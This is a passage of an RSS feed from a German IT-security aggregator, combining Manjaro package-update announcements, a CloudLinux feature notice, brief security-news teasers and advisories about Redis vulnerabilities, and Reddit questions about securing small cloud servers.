<li><strong>QEmu</strong> <a href="https://www.qemu.org/2025/12/24/qemu-10-2-0/">10.2.0</a></li>
<li><strong>Wine</strong> <a href="https://www.winehq.org/news/2026012301">11.1</a></li>
</ul>
<h2><a name="p-829045-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-829045-additional-info-4"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/185164/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/185164/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux510 5.10.248</li>
<li>linux515 5.15.198</li>
<li>linux61 6.1.161</li>
<li>linux66 6.6.121</li>
<li>linux612 6.12.67</li>
<li>linux618 6.18.7</li>
<li>linux619 6.19.0-rc7</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.66_rt15</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (1/26/26 19:48 CET)</p>
<ul>
<li>testing core x86_64:  29 new and 30 removed package(s)</li>
<li>testing extra x86_64:  1042 new and 1095 removed package(s)</li>
<li>testing multilib x86_64:  37 new and 37 removed package(s)</li>
</ul>
<p>List of changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1183/raw">here</a></p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/185164/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/185164">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Per-Site CageFS Isolation Now Available in Beta for CloudLinux Customers]]></title>
<description><![CDATA[We are announcing the beta release of Per-Site CageFS Isolation, a new feature designed to enhance security within multi-site accounts. Available at no additional cost to existing CloudLinux customers, this release marks the first phase of our comprehensive Website Isolation project.]]></description>
<link>https://tsecurity.de/de/3234446/unix-server/per-site-cagefs-isolation-now-available-in-beta-for-cloudlinux-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3234446/unix-server/per-site-cagefs-isolation-now-available-in-beta-for-cloudlinux-customers/</guid>
<pubDate>Mon, 26 Jan 2026 11:15:48 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://blog.cloudlinux.com/per-site-cagefs-isolation-now-available-in-beta-for-cloudlinux-customers" title="" class="hs-featured-image-link"> <img src="https://blog.cloudlinux.com/hubfs/per_site_cagefs.png" alt="Transitioning from Redis to Valkey in CloudLinux OS" class="hs-featured-image"> </a> 
</div> 
<p>We are announcing the beta release of <span>Per-Site CageFS Isolation</span>, a new feature designed to enhance security within multi-site accounts. Available at no additional cost to existing CloudLinux customers, this release marks the first phase of our comprehensive <span>Website Isolation</span> project.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatsDay Bulletin: Pixel Zero-Click, Redis RCE, China C2s, RAT Ads, Crypto Scams & 15+ Stories]]></title>
<description><![CDATA[Most of this week’s threats didn’t rely on new tricks. They relied on familiar systems behaving exactly as designed, just in the wrong hands. Ordinary files, routine services, and trusted workflows were enough to open doors without forcing them. What…
Read more →
The post ThreatsDay Bulletin: Pix...]]></description>
<link>https://tsecurity.de/de/3228536/it-security-nachrichten/threatsday-bulletin-pixel-zero-click-redis-rce-china-c2s-rat-ads-crypto-scams-15-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3228536/it-security-nachrichten/threatsday-bulletin-pixel-zero-click-redis-rce-china-c2s-rat-ads-crypto-scams-15-stories/</guid>
<pubDate>Thu, 22 Jan 2026 16:51:29 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most of this week’s threats didn’t rely on new tricks. They relied on familiar systems behaving exactly as designed, just in the wrong hands. Ordinary files, routine services, and trusted workflows were enough to open doors without forcing them. What…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/threatsday-bulletin-pixel-zero-click-redis-rce-china-c2s-rat-ads-crypto-scams-15-stories/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/threatsday-bulletin-pixel-zero-click-redis-rce-china-c2s-rat-ads-crypto-scams-15-stories/">ThreatsDay Bulletin: Pixel Zero-Click, Redis RCE, China C2s, RAT Ads, Crypto Scams &amp; 15+ Stories</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatsDay Bulletin: Pixel Zero-Click, Redis RCE, China C2s, RAT Ads, Crypto Scams & 15+ Stories]]></title>
<description><![CDATA[Most of this week’s threats didn’t rely on new tricks. They relied on familiar systems behaving exactly as designed, just in the wrong hands. Ordinary files, routine services, and trusted workflows were enough to open doors without forcing them.
What stands out is how little friction attackers no...]]></description>
<link>https://tsecurity.de/de/3228477/it-security-nachrichten/threatsday-bulletin-pixel-zero-click-redis-rce-china-c2s-rat-ads-crypto-scams-15-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3228477/it-security-nachrichten/threatsday-bulletin-pixel-zero-click-redis-rce-china-c2s-rat-ads-crypto-scams-15-stories/</guid>
<pubDate>Thu, 22 Jan 2026 16:21:36 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Most of this week’s threats didn’t rely on new tricks. They relied on familiar systems behaving exactly as designed, just in the wrong hands. Ordinary files, routine services, and trusted workflows were enough to open doors without forcing them.
What stands out is how little friction attackers now need. Some activity focused on quiet reach and coverage, others on timing and reuse. The emphasis]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-01-18 - Kernels, Python 3.14, KDE Frameworks, Plasma, GNOME, GRUB]]></title>
<description><![CDATA[Hello community, here we have another set of package updates.
Current Promotions

Get the latest Gaming Laptop by Slimbook powered by Manjaro: Slimbook Manjaro III
Protect your personal data, keep yourself safe with Surfshark VPN: See current promotion

Recent News

NVIDIA 590 driver drops Pascal...]]></description>
<link>https://tsecurity.de/de/3219872/unix-server/testing-update-2026-01-18-kernels-python-314-kde-frameworks-plasma-gnome-grub/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3219872/unix-server/testing-update-2026-01-18-kernels-python-314-kde-frameworks-plasma-gnome-grub/</guid>
<pubDate>Sun, 18 Jan 2026 13:30:48 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates.</p>
<h3><a name="p-826663-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-826663-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-826663-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-826663-recent-news-2"></a>Recent News</h2>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-01-18-kernels-python-3-14-kde-frameworks-plasma-gnome-grub/184988/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2026-01-18-kernels-python-3-14-kde-frameworks-plasma-gnome-grub/184988/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-01-18-kernels-python-3-14-kde-frameworks-plasma-gnome-grub/184988/1">(click for more details)</a>
<h2><a name="p-826663-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-826663-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated
<ul>
<li>including <strong>firmware</strong> updates</li>
<li>Kernel 5.4 and 6.17 including their modules are now removed from our repositories</li>
</ul>
</li>
<li><strong>Python</strong> <a href="https://docs.python.org/3/whatsnew/3.14.html">3.14</a></li>
<li><strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/frameworks/6/6.22.0/">6.22.0</a></li>
<li><strong>Cinnamon</strong> <a href="https://www.linuxmint.com/rel_zena_whatsnew.php">6.6</a></li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/261111/">570.211.01</a></li>
<li><strong>KDE Plasma</strong> <a href="https://kde.org/announcements/plasma/6/6.5.5/">6.5.5</a></li>
<li><strong>GNOME</strong> <a href="https://discourse.gnome.org/t/gnome-49-3-released/33609">49.3</a></li>
<li><strong>GRUB</strong> <a href="https://lists.gnu.org/archive/html/grub-devel/2026-01/msg00029.html">2.14</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/147.0.1/releasenotes/">147.0.1</a></li>
</ul>
<h2><a name="p-826663-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-826663-additional-info-4"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-01-18-kernels-python-3-14-kde-frameworks-plasma-gnome-grub/184988/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-01-18-kernels-python-3-14-kde-frameworks-plasma-gnome-grub/184988/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.161</li>
<li>linux66 6.6.121</li>
<li>linux612 6.12.66</li>
<li>linux618 6.18.6</li>
<li>linux619 6.19.0-rc5</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (1/18/26 13:00 CET)</p>
<ul>
<li>testing core x86_64:  101 new and 105 removed package(s)</li>
<li>testing extra x86_64:  5383 new and 5485 removed package(s)</li>
<li>testing multilib x86_64:  34 new and 31 removed package(s)</li>
</ul>
<p>List of changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1182/raw">here</a></p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-01-18-kernels-python-3-14-kde-frameworks-plasma-gnome-grub/184988/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-01-18-kernels-python-3-14-kde-frameworks-plasma-gnome-grub/184988">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[JFrog Researchers Uncover RCE Exploit for Existing Redis Database Vulnerability]]></title>
<description><![CDATA[JFrog this week published an analysis of a vulnerability in Redis databases that may be more serious than initially thought following the discovery of a remote code execution (RCE) exploit. Researchers found that a stack buffer overflow vulnerability in Redis…
Read more →
The post JFrog Researche...]]></description>
<link>https://tsecurity.de/de/3218891/it-security-nachrichten/jfrog-researchers-uncover-rce-exploit-for-existing-redis-database-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3218891/it-security-nachrichten/jfrog-researchers-uncover-rce-exploit-for-existing-redis-database-vulnerability/</guid>
<pubDate>Sat, 17 Jan 2026 16:35:37 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>JFrog this week published an analysis of a vulnerability in Redis databases that may be more serious than initially thought following the discovery of a remote code execution (RCE) exploit. Researchers found that a stack buffer overflow vulnerability in Redis…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/jfrog-researchers-uncover-rce-exploit-for-existing-redis-database-vulnerability/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/jfrog-researchers-uncover-rce-exploit-for-existing-redis-database-vulnerability/">JFrog Researchers Uncover RCE Exploit for Existing Redis Database Vulnerability</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatsDay Bulletin: AI Voice Cloning Exploit, Wi-Fi Kill Switch, PLC Vulns, and 14 More Stories]]></title>
<description><![CDATA[The internet never stays quiet. Every week, new hacks, scams, and security problems show up somewhere.
This week’s stories show how fast attackers change their tricks, how small mistakes turn into big risks, and how the same old tools keep finding new ways to break in.
Read on to catch up before ...]]></description>
<link>https://tsecurity.de/de/3215203/it-security-nachrichten/threatsday-bulletin-ai-voice-cloning-exploit-wi-fi-kill-switch-plc-vulns-and-14-more-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3215203/it-security-nachrichten/threatsday-bulletin-ai-voice-cloning-exploit-wi-fi-kill-switch-plc-vulns-and-14-more-stories/</guid>
<pubDate>Thu, 15 Jan 2026 16:05:37 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The internet never stays quiet. Every week, new hacks, scams, and security problems show up somewhere.
This week’s stories show how fast attackers change their tricks, how small mistakes turn into big risks, and how the same old tools keep finding new ways to break in.
Read on to catch up before the next wave hits.





  

  
  
    Unauthenticated RCE risk
    
      Security Flaw in Redis]]></content:encoded>
</item>
<item>
<title><![CDATA[[UPDATE] [mittel] Redis: Mehrere Schwachstellen ermöglichen Codeausführung]]></title>
<description><![CDATA[Ein lokaler Angreifer kann mehrere Schwachstellen in Redis ausnutzen, um beliebigen Programmcode auszuführen.]]></description>
<link>https://tsecurity.de/de/3214630/it-security-nachrichten/update-mittel-redis-mehrere-schwachstellen-ermoeglichen-codeausfuehrung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3214630/it-security-nachrichten/update-mittel-redis-mehrere-schwachstellen-ermoeglichen-codeausfuehrung/</guid>
<pubDate>Thu, 15 Jan 2026 12:05:53 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein lokaler Angreifer kann mehrere Schwachstellen in Redis ausnutzen, um beliebigen Programmcode auszuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[[UPDATE] [mittel] Redis: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen]]></title>
<description><![CDATA[Ein lokaler Angreifer kann eine Schwachstelle in Redis ausnutzen, um Sicherheitsvorkehrungen zu umgehen.]]></description>
<link>https://tsecurity.de/de/3214629/it-security-nachrichten/update-mittel-redis-schwachstelle-ermoeglicht-umgehen-von-sicherheitsvorkehrungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3214629/it-security-nachrichten/update-mittel-redis-schwachstelle-ermoeglicht-umgehen-von-sicherheitsvorkehrungen/</guid>
<pubDate>Thu, 15 Jan 2026 12:05:52 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein lokaler Angreifer kann eine Schwachstelle in Redis ausnutzen, um Sicherheitsvorkehrungen zu umgehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2026-01-13 - Kernels, KDE Gear 25.12.1, Haskell, Mesa]]></title>
<description><![CDATA[Hello community, here we have another set of package updates.
Current Promotions

Get the latest Gaming Laptop by Slimbook powered by Manjaro: Slimbook Manjaro III
Protect your personal data, keep yourself safe with Surfshark VPN: See current promotion

Recent News

NVIDIA 590 driver drops Pascal...]]></description>
<link>https://tsecurity.de/de/3211399/unix-server/stable-update-2026-01-13-kernels-kde-gear-25121-haskell-mesa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3211399/unix-server/stable-update-2026-01-13-kernels-kde-gear-25121-haskell-mesa/</guid>
<pubDate>Tue, 13 Jan 2026 23:00:39 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates.</p>
<h3><a name="p-824170-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-824170-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-824170-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-824170-recent-news-2"></a>Recent News</h2>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/stable-update-2026-01-13-kernels-kde-gear-25-12-1-haskell-mesa/184856/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/stable-update-2026-01-13-kernels-kde-gear-25-12-1-haskell-mesa/184856/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/stable-update-2026-01-13-kernels-kde-gear-25-12-1-haskell-mesa/184856/1">(click for more details)</a>
<h2><a name="p-824170-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-824170-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated</li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/25.12.1/">25.12.1</a></li>
<li><strong>Haskell</strong> <a href="https://hackage.haskell.org/package/haskell-language-server-2.2.0.0/changelog">2.2.0</a></li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/25.3.3.html">25.3.3</a></li>
</ul>
<h2><a name="p-824170-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-824170-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/stable-update-2026-01-13-kernels-kde-gear-25-12-1-haskell-mesa/184856/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2026-01-13-kernels-kde-gear-25-12-1-haskell-mesa/184856/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.64</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.4</li>
<li>linux619 6.19.0-rc3</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (1/8/26 21:25 CET)</p>
<ul>
<li>stable core x86_64:  17 new and 17 removed package(s)</li>
<li>stable extra x86_64:  1297 new and 1302 removed package(s)</li>
<li>stable multilib x86_64:  22 new and 21 removed package(s)</li>
</ul>
<p>List of changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1181/raw">here</a></p>
<p><a href="https://forum.manjaro.org/t/stable-update-2026-01-13-kernels-kde-gear-25-12-1-haskell-mesa/184856/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>1 post - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2026-01-13-kernels-kde-gear-25-12-1-haskell-mesa/184856">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Public vs private endpoints - what should I know that I may not know?]]></title>
<description><![CDATA[I’m frustrated with Shopify and want to move our e-commerce store to WooCommerce. I‘m debating between Vultr and DO currently for providers and have a budget of $100/mo. After doing some testing and initial development, we are planning on deploying 7 servers in total. This is a mix of web, databa...]]></description>
<link>https://tsecurity.de/de/3206200/it-security-nachrichten/public-vs-private-endpoints-what-should-i-know-that-i-may-not-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3206200/it-security-nachrichten/public-vs-private-endpoints-what-should-i-know-that-i-may-not-know/</guid>
<pubDate>Sun, 11 Jan 2026 02:50:16 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I’m frustrated with Shopify and want to move our e-commerce store to WooCommerce.</p> <p>I‘m debating between Vultr and DO currently for providers and have a budget of $100/mo.</p> <p>After doing some testing and initial development, we are planning on deploying 7 servers in total. This is a mix of web, database, Redis, and some management servers (either Zabbix or Prometheus).</p> <p>What are the risks involved by deploying with Vultr/DO since every server must have a public IP? </p> <p>Should we utilize the private VPCs or make our DB and Redis endpoints use TLS on public IPs? These would be restricted with the providers cloud firewall as first line of defense and nftables on the host as a second line of defense. (Similar to their managed DB services).</p> <p>Vultr has a 5 VPC limit, no peering between subnets. This means that all our servers would essentially sit in the same prod subnet where if one is compromised, they can see all the other hosts. </p> <p>Since each server is exposed on the public Internet essentially, does it matter they all exist in the same private space as well?</p> <p>I could keep the monitoring on a separate VPC but then I’m still exposing my endpoints over the internet to pull metrics.</p> <p>Im looking for some feedback and suggestions, maybe best practices. Without going to AWS/Azure, I’m very limited in locking things down it seems. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Fluent_Press2050"> /u/Fluent_Press2050 </a> <br> <span><a href="https://www.reddit.com/r/security/comments/1q9abls/public_vs_private_endpoints_what_should_i_know/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1q9abls/public_vs_private_endpoints_what_should_i_know/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thoughts & best practices on securing small cloud infra?]]></title>
<description><![CDATA[I’m frustrated with Shopify and want to move our e-commerce store to WooCommerce. I‘m debating between Vultr and DO currently for providers due to budget. After doing some testing and initial development, we are planning on deploying 7 servers in total. This is a mix of web, database, Redis, and ...]]></description>
<link>https://tsecurity.de/de/3206199/it-security-nachrichten/thoughts-best-practices-on-securing-small-cloud-infra/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3206199/it-security-nachrichten/thoughts-best-practices-on-securing-small-cloud-infra/</guid>
<pubDate>Sun, 11 Jan 2026 02:50:15 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I’m frustrated with Shopify and want to move our e-commerce store to WooCommerce.</p> <p>I‘m debating between Vultr and DO currently for providers due to budget.</p> <p>After doing some testing and initial development, we are planning on deploying 7 servers in total. This is a mix of web, database, Redis, and some management servers (either Zabbix or Prometheus).</p> <p>What are the risks involved by deploying with Vultr/DO since every server must have a public IP?</p> <p>Should we utilize the private VPCs or make our DB and Redis endpoints use TLS on public IPs? These would be restricted with the providers cloud firewall as first line of defense and nftables on the host as a second line of defense. (Similar to their managed DB services).</p> <p>Vultr has a 5 VPC limit, no peering between subnets. This means that all our servers would essentially sit in the same prod subnet where if one is compromised, they can see all the other hosts.</p> <p>Since each server is exposed on the public Internet essentially, does it matter they all exist in the same private space as well?</p> <p>I could keep the monitoring on a separate VPC but then I’m still exposing my endpoints over the internet to pull metrics.</p> <p>Im looking for some feedback and suggestions, maybe best practices. Without going to AWS/Azure, I’m very limited in locking things down it seems.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Fluent_Press2050"> /u/Fluent_Press2050 </a> <br> <span><a href="https://www.reddit.com/r/security/comments/1q9ae3d/thoughts_best_practices_on_securing_small_cloud/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1q9ae3d/thoughts_best_practices_on_securing_small_cloud/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-01-09 - Kernels, KDE Gear 25.12.1, Mesa 25.3.3, Haskell]]></title>
<description><![CDATA[Hello community, here we have another set of package updates.
Current Promotions

Get the latest Gaming Laptop by Slimbook powered by Manjaro: Slimbook Manjaro III
Protect your personal data, keep yourself safe with Surfshark VPN: See current promotion

Recent News

NVIDIA 590 driver drops Pascal...]]></description>
<link>https://tsecurity.de/de/3203357/unix-server/testing-update-2026-01-09-kernels-kde-gear-25121-mesa-2533-haskell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3203357/unix-server/testing-update-2026-01-09-kernels-kde-gear-25121-mesa-2533-haskell/</guid>
<pubDate>Fri, 09 Jan 2026 09:18:02 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates.</p>
<h3><a name="p-822371-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-822371-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-822371-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-822371-recent-news-2"></a>Recent News</h2>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-01-09-kernels-kde-gear-25-12-1-mesa-25-3-3-haskell/184723/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2026-01-09-kernels-kde-gear-25-12-1-mesa-25-3-3-haskell/184723/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-01-09-kernels-kde-gear-25-12-1-mesa-25-3-3-haskell/184723/1">(click for more details)</a>
<h2><a name="p-822371-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-822371-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated</li>
